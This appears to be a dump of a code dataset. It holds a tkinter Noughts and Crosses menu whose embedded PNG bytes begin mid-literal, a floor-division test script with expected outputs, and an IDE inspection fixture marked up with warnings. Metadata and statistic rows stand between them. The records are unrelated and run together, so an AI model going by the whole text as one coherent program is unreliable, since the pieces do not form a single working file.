A\xd7]!\x02>"\x80\r]n\xfe\xee\xbb\xef\xbe\xb1\r]rk:\x05\x9c\xc2\xefZ\xb7^\xa8[\xb7n\xa7\xe6v\x9d>\x17\x01\x11\xf0\x1f\x01\t\xba\xff\xc6L-\x0e9\x01dps\x92\xc8\x98\xa5\xbe/\x1c\xe6f\xb7\x94\xb1\xee\xd4\xb1!\xc7\xa8\xee\x8b@\xe0\x08H\xd0\x037\xa4\xeaP\x90\t\xbc\xf5\xd6[c\xcf>\xfb\xec\x8br\xea\xa3[\xac\xdd\xbf[\xa4;\xaf\xa1\xb5\xde\xbbw\xef+\x82\xccH}\x13\x81\xb0\x12\x90\xa0\x87u\xe4\xd5o\xdf\x11x\x1b\x07\xdc\xe5gXt\xbb;\x9d\xab\xdbb\xa7\x98\xbb\xe7\xd7\xdd\xd1\xf1t\xbd\x0f\x1d:\xf4\x99\xfa\xf5\xeb\x97\xf3\x1d\x005X\x04D`\x9f\x04$\xe8\xbaAD\xc0\x07\x04\x90\nv\xc8q\xc7\x1d\xd7\x8dnv[\x86\xc6f[\xeaV\xeb\x82m\xb2\xe2\xde\xad\xcd\xb6_\xb5\xf7\xf0Z\xe4\xcb/\xbf\xfc\xd5\x07\xddV\x13E@\x04\xf2@@\x82\x9e\x07X:U\x04RA\xe0\x8a+\xae\xb8\xb0O\x9f>7\x94)S\xc6\xa9\x9e\x16:E\x9d\x967\x83\xdel\x9e\xdc\xde3\xa1\xb7\xd4\xae\xdc~\xd5\xc4\xdc\xf6:\x87\x85\xde`\xc4\x88\x11\xaf\xa5\xa2?\xaaS\x04D 
1\x04\x94\xcb=1\\U\xaa\x08\x14\x98\xc0\x13O<\xf1`\xbbv\xed\x8e\xc2\xeeg\xed\xdcK\xcf\xdc)_M\xcc)\xd8\xe6\x8a7\x91\xb7\xacr\xfc\xcc\xaeq\xafK?\xef\xbc\xf3.Z\xb5j\xd5\nD\xce\xdfR\xe0\xc6\xaa\x00\x11\x10\x01\x11\x10\x01\x11\xc8\x0b\x81\x9a5k\x96\x83PeA\xa4\xf8\xe2\x1c\xf7\xdcs\xcf\xc0\xbc\x94\xe1\x87s\x11\xf8v\xa2\xf5\x11\x19\xde\xb2 \xd2\xd9\xfdu\xf7\x9doB\xa4\x9d\x1f\x1ep\xaf;\xafv\xbe\xfb:\xcc\xadg\xd9\x8f\x9b\xe1UW]u\xa1\x1f\x98$\xbb\x8d\xe4l\xac\xf9\xfa\x0e\x8ed\xb7A\xf5\x89@^\x08\xc8\xe5\x9e\x17Z:W\x04\x92@\xa0M\x9b6u\x07\r\x1a\xf4$]\xea\xb4\xb2\xe92\xa7\xf5m\x91\xeb\xf6\xbee\x8a\xa3\xf5\xcd\xb9\xf57\xdf|s4\xac\xf9F\xcb\x96-[c\te\xccj\xb7\xcdXx.\x7f\xb6n\xdd\x9a\x1d8\x07O\xc0\x0b\x9d;wn\x9d\x84\xae\xa9\n\x11\x10\x01\x11\x10\x01\x11\xd8C \xe8\x16:\xfaW\x14\xe2\xbb\x9b\x164\xad\xe9ho\x84\xdb\xe2v[\xe2L\xe5j\xf7H\x95*UJ\xc0b\xcf6\xe9Y\x8eY\xf09Y\xec\x91rv\xb4l\xd9\xb2\xaa\xee\xb3\xff\x11\x90\x85\xae\xbb\xc1o\x04d\xa1\xfbm\xc4\xd4\xde\x7f\x11\xa0 \x05\x05\xcb#\x8f<\xf2\x12,\xf0\xec\xffK\xb3\xac\xf9\xea\x9e\xfff\x7f\xd9\xedHr\x99,\x04\xb9\xd53\x06+W\xae\xdc\x0e+\xbf\xbea\xa1EoIhh\xb1[\x80\x9cY\xeb\xb4\xfc\xf1y\xb1?\xfe\xf8C;\xae\x05\xe5FR?BI@\x82\x1e\xcaaW\xa7\xbdH\xe0\xddw\xdf}\xe7\xdcs\xcfu\x92\xc6P\x8cMp\xf9\xb7m\x81\xca\xf7\xb9\x0c\x8dGD\xec\xb3\x9a7o^%\xba?\x7f\xfd\xf5\xd7\x12l\x8bZ\x9b\xef\xdb\x9at\xb7\x90\xf3}> D\xc4\xdc9\x87\x0f\x12_\xe3\xf0"\x1b\xb5I\x04D w\x02\x12\xf4\xdc\x19\xe9\x0c\x11H8\x81\x91#G\xbev\xea\xa9\xa7\x9enbm\x15\x9a\x95mbL\xe1\xb5yqX\xd5Y\xadZ\xb5\xaa=}\xfa\xf4\xd595\x10\xef/\xe9\xd4\xa9\xd3A,\xd3\x1e\x10\x18\x01oe\xb2\x1c\xdbN\xd5\xc4\x1ds\xe9G\xf4\xeb\xd7OQ\xef\t\x1fqU \x02" \x02!\'\x90\xd3\x1c:\x02\xc8\xee\xf43\x16D\xb1o\xb5hu\x0be\xb79o\xfb;z>\x17\xc2\xbcc\xff\xfd\xf7\xaf\x18K\xbf\xaf\xbe\xfa\xea+\xa2#\xe0m~>\xba\xde\xc8|\xfa\xee\x83\x0f>\xb8y,e\x07\xf9\x1c\xcd\xa1\x07yt\x83\xd97Y\xe8\xc1\x1c\xd7 
\xf7*0\xf3\xe5\x1c\xa4\xc1\x83\x07\xdf\x8f(\xf6\x92\xb4\x9ai\x85\xdb\xab;\xd3\x9b\xcd\xa3\x9b\xeb|\xf1\xe2\xc5\xf3\xb1\x97y\x89\x193f\xac\x8de\xa0\x9f~\xfa\xe9\x17.\xbb\xec\xb2\x0bm\xcd:-s\xdb\xad\x8d\xd6\xbb\xcd\xaf\xd3z\x8f\xcc\xd3\x17\x9e:u\xea\xef\x08\x92\xab\x16K\xf9:G\x04D@\x04D@\x04\xf2L\x00\x16z\xd9\xe8\xc8o\xbfZ\xe8Xf6"\xa75\xe5n\xab\xdcmAs\x8d9\xa3\xd7\xf3\x0c-r\xc1\x95W^y\x19-s\xaek\x8ff\x18\xdd\x8e\x88u\xba\xbb^\xbdz\xe5\xf3[\x9f\xdf\xaf\x93\x85\xee\xf7\x11\x0c_\xfbe\xa1\x87o\xcc\xd5c\x0f\x10\x18;v\xec\xa8\x1e=z\x9cG\xab\xdbr\xb3\xd3\x12\xa7\xb5\xccW\xf7\x06+\xb6\xfe\x9c\x166,\xeb\xb4\xfc6\xff\xf5\xd7_\x7f\x15\xfb\xbb\x8c\xe5\xbavK\x13ku\xb3\x1d\xdb\xb6m\xcb\x9e_w\x05\xc9\xfd\x9c\xdf\xfat\x9d\x08\x88@r\tH\xd0\x93\xcb[\xb5\x89@\xa1\x9e={\x9ew\xc6\x19g\x9c\xe3\x0eN\x8b\xdep\xc5\xdc\xe0\x14s\x13`l\x9d:\x1a\x82\x9e\xeft\xcd\x10\xec\xcc\xf3\xcf?\xff,x\x06\xc6\xb8\x13\xcfX\xdd%K\x96\xcc\x8e\x88\xa7\xfb\x9dG\xdd\xbau\x1b\xf2\xe1C\xc3&\x02" \x02" \x02q%\xe0w\x97;\xc4\xf4\r\x0bxs\xa7a\xcd)\x89\x8c\xdb\xdd\x8e\xcfw\xc5\x0bd\xe9\xd2\xa5\x0b\xa3\x1do\xb1\x1dnW\xbb\xbb\r\xee\xa09&\xa39\xeb\xac\xb3N\x89W\xfd~)G.w\xbf\x8c\x94\xda)\x02"\xe0K\x02~\x16t\xe6g\xa7\x88\xba\xc5\xd2\xb2\xbdY67\x8aHt\x84\xfb\xa8Q\xa3^\x87\xa5\x1c\xd7\xb9\xec\xf4\xf4\xf4\xe2cp\xb8E\x9c\xf5Z.x{\x98p}\xbe\xbbv\xed\xda%|y\xd3\xe4\xb3\xd1\x12\xf4|\x82\xd3e" 
\x02"\x10\x0b\x01?\x0b\xfa\xa2E\x8b\x96F[\xbe\x16\x00\x97\xd3+-c\xcc\xb3\x9f\x1c\x0b\x97\xfc\x9c\x03\x17{\xe1!C\x86<\x12\xbdt\x8dm\x84{>\xbbI\xf6\x80\x81\xe8\xfa\x85\xf9\xa9\xc7\xaf\xd7H\xd0\xfd:r\xe1m\xb7\xe6\xd0\xc3;\xf6\xeay\x12\t<\xfb\xec\xb3C\xf6\xdbo\xbf\x1a\xb6\x8d)\xe7\xcf9\x8f\xcd\xb9j\x0bz\xb3W.%\xc3\xe6);_~\xf9\xe5\xa70o\xfe~\xa2\x9a\xc99\xf5\x1bo\xbc\xf1\x16D\xbf;\xd9\xe9x\xd8V\xab%J\x94p\xdaf\ti\xd8\xb6Z\xb5j\xd5\xc1C\xc9\x82f\xcd\x9a9\x19\xe8t\x88\x80\x08x\x8b\x80\x04\xdd[\xe3\xa1\xd6\x04\x94@\xe3\xc6\x8d[b\xee\xda\xe9\x1d\x85\x92Q\xe4\x14\xcfH\xe4zv\xaf\xf9\x1e\x83\xe0\xbaw\xef~\x0c\xb65\xbd.\x198^x\xe1\x85\xe1HRS\x05\x1b\xbc,s\xaf\x7f\xb7\xc09w.\xf8J\x95*\xd5\xfd\xfb\xef\xbf\x17}\xf3\xcd7J\x11\x9b\x8c\xc1Q\x1d" \x02"\x10T\x02~t\xb9#J|\xb4\xf9\xaf\xe9\xce\x8e^\xf3\xed\x9e\xb7\xe6g\x88\x82\xbf U\xe3\x87\xadW\x97\xd3\xd5\xefncN\xf3\xfa\xec\x07\xb6]}4U\xedLF\xbdr\xb9\'\x83\xb2\xea\x10\x01\x11\x08-\x01\xbf\t:\\\xd4\x0b-\x89\x0b\xe7\xa5M(\xf9\xea\x9eO\xb7d/\x93\'O\xfe&\xd5\x83\x9b\x91\x91\xb1"\xa7\xe43\xec\x87;1\r\xd3\xcf\x069E\xac\x04=\xd5w\xa2\xea\xcf+\x01\xb9\xdc\xf3JL\xe7\x8b@\x8c\x04\xb0\xe1\xca\xebx\x00\xa9\xc3yh\xba\xad9/m\xe9[\xf9j\xf3\xe9t\xc1\xd3\xcd\x0eK}g\xc7\x8e\x1d\x0f\x8f\xb1\xf8\x84\x9dV\xbdz\xf5\xaa\xeb\xd7\xaf_as\xfa\xee\x8a\xd8\xeeH[\x19\x03P\xec\x9dw\xde\x99\x80\xa9\x81\x9e\xe5\xca\x95+\x9e\xb0\x06\xa9`\x11\x10\x81\x98\x08H\xd0c\xc2\xa4\x93\xbcL\x00"\x93\xef\xeci\x89\xea\xd7\xdc\xb9s\xe7\x9fs\xce9\x17R\xb4\xdd\xcd\xb3d2\xeez#\xc2\x99\x05\xa1,\x82T\xab{&\xdaS|T\xadZ\xb5\xda\xb8q\xe3\xde\x8an;\xfff\x1f(\xea<\xb0\x94\xad\x16\x02\xfe^\xfc\xf5\xd7_\x7fOq\x93U\xbd\x08\x84\x9e\x80\x04=\xf4\xb7\x80\x00\xc4\x93\x00\x82\xd9\x8e^\xb2d\xc9\xaa\x06\r\x1a\xd431\xa4\x05\xce\xb4\xaa<\xec\x95\xbf3C\x1b\x7f`\xb9g6l\xd8\xb0*\x92\xb7\x9c\xb8`\xc1\x82-\xf1lOA\xca\xc2\xba\xf9\xb30\xff?\x96e\xd8\x061\xe6m\xb0\xe09{@\x81\'\xa2>\xc4\xbdTA\xea\xd3\xb5" \x02" 
\x02!"\x90\xd3\x1c\xfa=\xf7\xdc3\xd0+\x08\x16.\\\xb8h\xcb\x96-N\x0c\x9c%\x8bq\xaf1\xb7ys\x06\x9e\xd9\xdc\xfa3\xcf<\xf3\xa4W\xda\x9fS;\xe0R\xbf\xdc\xbdV\xdd\x82\xe4\xdc\xc1s\xec\x17\x1ed\x16{\xb9\x1fym\x9b\xe6\xd0\xf3JL\xe7\x8b\x80\x08\x88@\x1e\x08xY\xd0am\xef\xc8i\x1fs\x13\xf4\xcd\x9b7g\x8b\xb8\xa5]\x8dgJ\xd7<`\xcc\xf3\xa9\xc8V7\xca\x1d\xa9\xef~H\xb1@?\n<\x96\xbe-n\xd1\xa2E \xd6\xa9K\xd0\xf3|\x9b\xe8\x82\x14\x13\x90\xcb=\xc5\x03\xa0\xea\xe3B \xa5s\xe8]\xbbv\xed\xf8-\x0e\xb8\xd8\x8b\xb9\xf7\x167\xf74{\x08\xab\xbd\x10\xd7\xa1[\xa0\x19\xcf\xa3K\x1en\xf6\x93\xe2B \xc1\x85\x9c\x8bc\xd2\xa4IS\x11\xfd\xee\x04\xf31\xf9\r\x0fw\x1f\xb9n\x1d1\x00\xb5\xb0\xae\xfdm\xc4\x0f\x84.\xf7{\x82\x87@\xc5\x8b\x80\x08\x88@\xb0\x08\xec\xc5B\xbf+\x95\xbdD\xf0\xd8\x9bf\xa5\xd2\xf2F\x96\xb7\x7fdr\x8d\xce\xddn.\xeb\xc1\x83\x07\xdf\x97\xcav\xe7\xb5\xee\xe6\xcd\x9b\xd7\x1e:t\xe8\x93{\xf3B\xb8\xd7\xd8C\xf8w\x9fy\xe6\x99\xc7\xe7\xb5\x0e/\x9d/\x0b\xddK\xa3\xa1\xb6\xc4B \xdf[1\xc6R\xb8\xce\x11\x81\xa0\x13@\x10\xdb\x1c\xf41\xdd\xa2\xbfiy\x9b\x95n\x81d\x96N\x95,h\xa1\xf3s\x18\xbc\'a\xcey\x9e\x9f\xf8 
C\xdc\xe2>}\xfa\\\x87lq\x95`\x81\x9fg\xdb\xae\xd22\xe7a\xcb\xf0\xf8;\xa2\xe0\x0bc\xef\x97\xf7\xd1W}\xc7\xf8i\x90\xd5V_\x13\x90\xcb\xdd\xd7\xc3\x17\xca\xc6\xa7\xd4\xbd\xee&\xde\xb4i\xd3*\xdc/\x1c?U)\xd4\x16\xd5N7\xb4\xe5@\xe7{&x\x14@\x8a9\x04~\xf7\x9a5k\x96~\xf7\xddw\x7f\xfbq\x04\xf10r\xfe\x93O>9\x84\xfd\xb2\xbe\xd9T\x82;\xfa\x1d}/\x82lr\x8f\xfb\xb1\x8fj\xb3\x08\x88\x80\x08\x88@\x82\t\xc0\xe5^\xce\xa2\xc3\xcd\xaf\x8d(\xf7\xbb\x12\\m\x8e\xc5#\xab\xdbD\xb6\x81\xa9[\xdd\x19\xe0,"\xdc"\xd9\xcdEm\xd9\xe1Z\xb5jU+\x15\xed\x8dg\x9d\x08|\xab\x858\xb9\x91\xee\x14\xb1\xee\xecrn\x1e\xf3\xe6\xcd[\n\xa3\xde3\x0fb\xb1r\x90\xcb=VR:\xcf+\x04d\xa1{e$\xd4\x0e\xdf\x108\xf6\xd8c\xf7\xbf\xfb\xee\xbbo;\xf4\xd0C\x9d\xacn\xdc`\x85\x87\xb9\xd8\xb9\xee\x9c\x968\xadWs\xb1\xf3s\x08\xffn\xb8\xa5\xb3:w\xee|\x84o:\xbb\x97\x86N\x9b6m\xc9m\xb7\xddv\x05W\xe7\xd9)L6C/\x84{\xad:\x7f\xaf_\xbf~\x8d\xa9S\xa7\xce\x85\x9b\xfet\xbf\xf7[\xed\x17\x01/\x13\x90\xa0{yt\xd46O\x12\x980a\xc2\x0c\x88\xf3\x0e\x8a\xb6\xcd#\xd3\xb5n.w\xbe\xef\x8ef\x8f\x88}\xd6\xc9\'\x9f\xdc\x11\xe7\x14F~\xf7%\x9e\xecX\x1e\x1b\x855\xf7\x9b9G>e\xca\x94\xef\x8d\x03\x8bp\xcf\xa5\xf3w\x8az\xa3F\x8d\xea#\x15\xee;\xd8S}n\x1e\xab\xd1\xe9" \x021\x12\x90\xa0\xc7\x08J\xa7\x89\x80\x9b\x00\x02\xbe^\x83\x8b9\xd3\xb6\x18\xe5g\x14t\n\xb9;\xdd+\xadv\xec`\xb6n\xd8\xb0a\x8f}\xf6\xd9g?\xf0\xbc\xf7\xdf\x7f\x7fb\x90h"\xff|\xfb\xe7\x9f\x7f\xfe\t\n\xb7\xf1p\x07\x02\x1a\x17\xf6\x99\xc2\x8f\xb4\xb2\n\x94\x0b\xd2\r\xa0\xbex\x86\x80\x04\xdd3C\xa1\x86\xf8\x89\x00\xdc\xc8\x8d\x90\xb2\xd5\xf9\xffq\xe7g\xb7\xdf)\xeat\xbd\xf3\x15\xd9S_\x1a2d\x88g\xb2\xd9%\x82\xf35\xd7\\s\x83y(\xa2\xa3\xfa\xc9\x84^\x0b\xbe\xd6\xaaU\xab\xf6\x8a\x15+v%\xa2\r*S\x04\xc2N@\x82\x1e\xf6;@\xfd\xcf\x17\x01\x04y\xd5\xa0@\xb9s\x9c\xb3 
Z\xa8\x96t\x85s\xeb\x8ch\xc7\xe6%\x0f"0\xcc39\xda\xf3\xd5\xe1\x18.Bn\x9d\x8f,\x92\x9f\x0f3<lZ\xc2\x1en\xb8C\xdbSO=58\x86\xe2t\x8a\x08\x88\x80\x08\x88@\x90\tx%\xca\x1dk\xc8\x97\xba\x13\xac\xb8#\xdd\x19\xe5n\xc9e\x909-=\xc8\xe3\x91S\xdf\xb0\xd3\x9c\xb3\x07<\x99XR\x1dK:\xc3WF\xff#0\xf0`\xafsQ\x94\xbb\xd7GH\xed\x8b& \x0b]\xf7\x84\x08\xe4\x91\x00\xd6\x9fW\xaf\x81\xc3\x12\xc8\xd0R\xa75N\x97\xb3\x05\x87!p\xee\x9d\x89\x13\'~\x8c\xc43\x9b\xf2X\xbc\xefO\xef\xd4\xa9Ss\x04\xfe-\xe0t\x03\x7f\xcc\x05o{\xc0\xd3\x8b1b\xc4\x88\xf7}\xdfQu@\x04<F@\x82\xee\xb1\x01Qsr%\x90\x95\xeb\x19\t>\x01\xf9\xd7/r\xcf\x17\xf3w\x8a\x16\x84\x9dArY\x19\x19\x19KN=\xf5\xd4\xee\x17\\pA\xb7\x047\xc5\x93\xc5\xa3\xff\x9b[\xb7n\xdd\x10k\xd5k\xdcq\xc7\x1d})\xea\xd1\x89g\xb0\xd5ju\xee\xe2\xe6\xc9\x0e\xa8Q"\xe0S\x02\x12t\x9f\x0e\x9c\x9a\xfd\x0f\x02I\x15\xf9\xb6m\xdb\x1ebs\xc4\xb6D\x0b)Q/\xc3\xefE\xb8,\r\xc6\xbb\xb3\xdb\x18\xac\xd4=\x9b\xa0\x87\xf0X\xb7n]\xe6\xcc\x9933^}\xf5UF\xbf\xef\xc6\xd2\xb6I\xeelz\xe46{\xf6\xec\xe9!D\xa3.\x8b@\xc2\x08h\xf9H\xc2\xd0\xaa\xe0\xa0\x12\xe0\x12\xadn\xdd\xba\x9d\x01\xa1J\xe3\xf6\xa7W_}\xf5\xa5H\x9c\xf2mP\xfb[\x90~a\xc9\xde.\x88wQD\xb7\x979\xe5\x94S\xce\xc2\xf6\xaa\xf3\xb0\xdco+\xcb\xfc\xf2\xcb/\xa7\x16\xa4l]+\x02"\xf0O\x02\x12t\xdd\x11~#\x90Tk<\'8\x9f|\xf2\xc9$Z\xe3~\x03\x97\xca\xf6"\x88p3\xa2\xfd_Ie\x1bT\xb7\x08\x04\x9d\x80\\\xeeA\x1fa\xf5O\x04D@\x04D \x14\x04$\xe8\xa1\x18fuR\x04D@\x04D \xe8\x04$\xe8A\x1fa\xf5O\x04D ^\x04R>\xdd\x13\xaf\x8e\xa8\x9c`\x12\x90\xa0\x07s\\\xd5+\x11\x10\x01\x11\x10\x81\x90\x11\x90\xa0\x87l\xc0\x03\xd0]YI\x01\x18DuA\x04D \xfe\x04$\xe8\xf1g\xaa\x12E@\x04D@\x04D \xe9\x04$\xe8IG\xae\nE@\x04D@\x04D \xfe\x04$\xe8\xf1g\xaa\x12\x13K -\xb1\xc5\xabt\x11\xc8&\xa0\xe9\x1d\xdd\x0c\xbe" A\xf7\xd5p\xa9\xb1{! 
\x91\xd7\xad\x91\x08\x02\x12\xf4DPU\x99\t# AO\x18Z\x15,\x02" \x02" \x02\xc9# AO\x1ek\xd5\x14\x1f\x02\xbag\xe3\xc3Q\xa5\xe4\x9d\x80<Ayg\xa6+\x92H@_\x8eI\x84\xad\xaa\xe2B\xa0X\x0e\xa5d\xc6\xa5d\x15"\x02\xfb&\xb0[\x80D\xc0\xcb\x04$\xe8^\x1e\x1d\xb5\xed_\x04\x96.]\xba\x1aofq\x0fr\xecv\xc6\xcf\xb3\xbe\xfa\xea\xabO\x84J\x04\xe2M`\xc1\x82\x05sl\xaf{\xbcf}\xfa\xe9\xa7\xef\xc7\xbb\x0e\x95\'\x02" \x02\xa1&p\xd8a\x87\x1d<~\xfc\xf8w\xf0\x85\xbb\xe0\x96[n\xb9\xaeR\xa5J\xda50\xd4wDb:\xdf\xaaU\xab\x06#G\x8e|}\xe1\xc2\x85\xf3\xef\xbf\xff\xfe\x81\x89\xa9E\xa5\x8a\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08
\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88@N\x04\xfe\x1f0\x98\xc4b\xda\x84\xb8\x13\x00\x00\x00\x00IEND\xaeB`\x82').subsample(3,3)
menu.geometry('324x400')
menu.title("Noughts and Crosses")
menu.configure(bg='#404040')
label1=Label(master=menu,image=photo,bg='#404040').pack()
label2=Label(master=menu,text='WELCOME!',font=('Helvetica',20),bg='#404040',fg='white').pack(pady=10)
b01=Button(master=menu,width=10,text='START!',font=('Helvetica',10),bg='#363636',fg='white',command=start).pack(pady=5)
b02=Button(master=menu,width=10,text='TUTORIAL',font=('Helvetica',10),bg='#363636',fg='white',command=tutorial).pack(pady=5)
b03=Button(master=menu,width=10,text='LICENSE',font=('Helvetica',10),bg='#363636',fg='white',command=license).pack(pady=5)
b04=Button(master=menu,width=10,text='MORE',font=('Helvetica',10),bg='#363636',fg='white',command=more).pack(pady=5)
menu.mainloop()
menuscreen()
| 605.933702
| 86,176
| 0.724465
| 24,382
| 109,674
| 3.252645
| 0.152982
| 0.017704
| 0.024399
| 0.031322
| 0.229024
| 0.222669
| 0.214801
| 0.212947
| 0.209745
| 0.207651
| 0
| 0.226291
| 0.018865
| 109,674
| 180
| 86,177
| 609.3
| 0.51071
| 0.009993
| 0
| 0.219178
| 0
| 0.589041
| 0.646963
| 0.619829
| 0
| 1
| 0
| 0
| 0
| 1
| 0.068493
| false
| 0.020548
| 0.013699
| 0
| 0.09589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99f13d954e265de59619f1b4da46bf81e69b06f2
| 386
|
py
|
Python
|
chocopy-rs/test/pa3/div.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 5
|
2020-05-13T03:47:43.000Z
|
2022-01-20T04:52:42.000Z
|
chocopy-rs/test/pa3/div.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 4
|
2020-05-18T01:06:15.000Z
|
2020-06-12T19:33:14.000Z
|
chocopy-rs/test/pa3/div.py
|
wwylele/chocopy-rs
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | null | null | null |
print(21 // 3)
print(21 % 3)
print(21 // -3)
print(21 % -3)
print(-21 // 3)
print(-21 % 3)
print(-21 // -3)
print(-21 % -3)
print(21 // 9)
print(21 % 9)
print(21 // -9)
print(21 % -9)
print(-21 // 9)
print(-21 % 9)
print(-21 // -9)
print(-21 % -9)
print(0 // 3)
print(0 // -3)
print(0 % 3)
print(0 % -3)
#!
#<->#
#7
#0
#-7
#0
#-7
#0
#7
#0
#2
#3
#-3
#-6
#-3
#6
#2
#-3
#0
#0
#0
#0
#<->#
| 8.577778
| 16
| 0.455959
| 80
| 386
| 2.2
| 0.1
| 0.636364
| 0.363636
| 0.590909
| 0.931818
| 0.931818
| 0.886364
| 0.886364
| 0.886364
| 0.755682
| 0
| 0.251656
| 0.217617
| 386
| 44
| 17
| 8.772727
| 0.331126
| 0.085492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
820a0f0ad6f36167e024f401b5f5d4255ee4ff03
| 237
|
py
|
Python
|
python/testData/inspections/PyUnresolvedReferencesInspection/UsedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UsedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UsedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2022-01-02T19:58:08.000Z
|
2022-01-02T19:58:08.000Z
|
<warning descr="Unused import statement">from my_package.my_module import <error descr="Unresolved reference 'eggs'">eggs</error></warning>
from my_package.my_module import <error descr="Unresolved reference 'eggs'">eggs</error>
eggs()
| 47.4
| 139
| 0.78481
| 33
| 237
| 5.515152
| 0.393939
| 0.065934
| 0.142857
| 0.164835
| 0.758242
| 0.758242
| 0.758242
| 0.758242
| 0.758242
| 0.758242
| 0
| 0
| 0.080169
| 237
| 4
| 140
| 59.25
| 0.834862
| 0
| 0
| 0
| 0
| 0
| 0.324895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.666667
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
419dc10c5b51a8d2c903e93499bef6f966465f17
| 6,967
|
py
|
Python
|
src/test/python/test_storage/test_var.py
|
ettoreleandrotognoli/py-storage
|
d19a0ccbbb23aed818461775a9fc3cd7c5cc25fa
|
[
"Apache-2.0"
] | null | null | null |
src/test/python/test_storage/test_var.py
|
ettoreleandrotognoli/py-storage
|
d19a0ccbbb23aed818461775a9fc3cd7c5cc25fa
|
[
"Apache-2.0"
] | 4
|
2021-04-13T20:43:11.000Z
|
